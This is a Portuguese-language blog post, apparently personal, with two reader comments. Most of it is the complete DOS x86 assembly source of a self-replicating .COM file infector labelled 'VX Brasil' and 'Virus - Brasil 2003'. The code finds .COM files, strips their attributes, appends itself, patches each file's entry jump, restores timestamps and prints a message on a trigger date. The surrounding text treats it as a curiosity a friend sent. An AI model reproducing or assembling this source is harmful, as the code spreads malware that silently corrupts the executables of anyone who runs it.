Bem, essa telinha aí eh o resultado do arquivinho q minha amiguinha Fran me mandou, tardiamente, numa noite de insônia. Demorei um pouco p saber q num era ela e depois pareceu ser um outro amigo q não seria nada estranho trocarmos ideias sobre assmebly e coisas do gênero. Minutos depois, meu router começou a cair, e os logs de tentativa de spoofing se multiplicaram.
Agora a casa do ferreiro vai parar de ter espeto de pau, e isso foi mais um sinal :D
Olha as coisas q uma fisioterapeuta é capaz de faze nos dias de insônia :
; VX Brasil.com – Vrs 1.0
;***********************DIRETIVAS************************
VirusSize equ (fim-inicio)
.286
code segment
assume cs:code,ds:code,es:code,ss:code
org 100h
;***********************CODIGO****************************
inicio:
call vIrus
virus:
nop
pop bp
sub bp,offset virus
mov ax,word ptr [Original+bp]
mov cs:[100h],ax
mov ax,word ptr [Original+bp+2]
mov cs:[102h],ax
mov ah,1ah ; ajusta DTA
lea dx,[bp+DTA]
int 21h
mov ah,4eh
mov cx,20h
lea dx,[bp+arqs]
AchaArqs:
int 21h
jc termina1
mov ax,4300h
int 21h
mov [bp+atribs],cx
xor cx,cx
mov ax,4301h
int 21h
mov ax,3d02h
lea dx,[bp+DTA+30]
int 21h
mov bx,ax
mov ax,5700h
int 21h
mov [bp+horaarq],cx
mov [bp+dataarq],dx
mov ah,3fh
mov cx,4
lea dx,[bp+Original]
int 21h
jmp continua
termina1:
jmp termina
continua:
cmp [Original+bp+3],90h
je NaoInfectar
cmp word ptr [Original+bp],’ZM’
je NaoInfectar
cmp word ptr [Original+bp],’MZ’
je NaoInfectar
mov ax,4202h
call MovePonteiro
cmp ax,65278-VirusSize
ja NaoInfectar
sub ax,3 ; calcula distancia do salto
mov [bp+Distancia],ax
mov ah,40h
mov cx,VirusSize
lea dx,[bp+inicio]
int 21h
mov ax,4200h
call MovePonteiro
mov ah,40h
mov cx,4
lea dx,[bp+jump]
int 21h
NaoInfectar:
mov ax,5701h
mov cx,[bp+horaarq]
mov dx,[bp+dataarq]
int 21h
mov ah,3eh
int 21h
mov ax,4301h
mov cx,[bp+atribs]
int 21h
mov ah,4fh
jmp AchaArqs
termina:
mov ah,2Ah
int 21h
cmp dh,1
cmp dl,9
jne NaoManifestar
call Manifesto
NaoManifestar:
cmp word ptr [arqs],2e2ah
je fim
mov ax,100h
jmp ax
;***********************PROCEDIMENTOS*********************
MovePonteiro:
xor cx,cx
xor dx,dx
int 21h
ret
Manifesto:
mov ah,9
lea dx,VirusString+bp
int 21h
ret
;************************DADOS E VARIAVEIS****************
VirusString db ‘Virus - Brasil 2003’,0ah,0dh,07h,’$’
original db 0E8h,00,00,90h
jump db 0e9h
distancia dw ?
marca db 90h
atribs dw ?
arqs db ‘*.com’,0
horaarq dw ?
dataarq dw ?
DTA db 43 dup (0)
fim:
mov ax,4C00h
int 21h
ends code
end inicio
2 comentários:
Nussa for maior divertido tc com vc...kkkk
trocamos ideias e vc e um usuario bem inteligente em relação ao SO free..
mais com relação ao roteador e a tentativa de spolfing ter aumentado...essa autoria nao e minha nao
rsrsrrsrs
eu mandei o codigo e te disse q era um virus em assembly, so q para x86 e nao linux...kkkk
e avisei pra nao compilar era so pra ver se vc conhecia bem assembly
kkkkkkkkkkkkk
mais foi dahora, vc e gente fina...t+ um dia....auhauhauhu
flw
Postar um comentário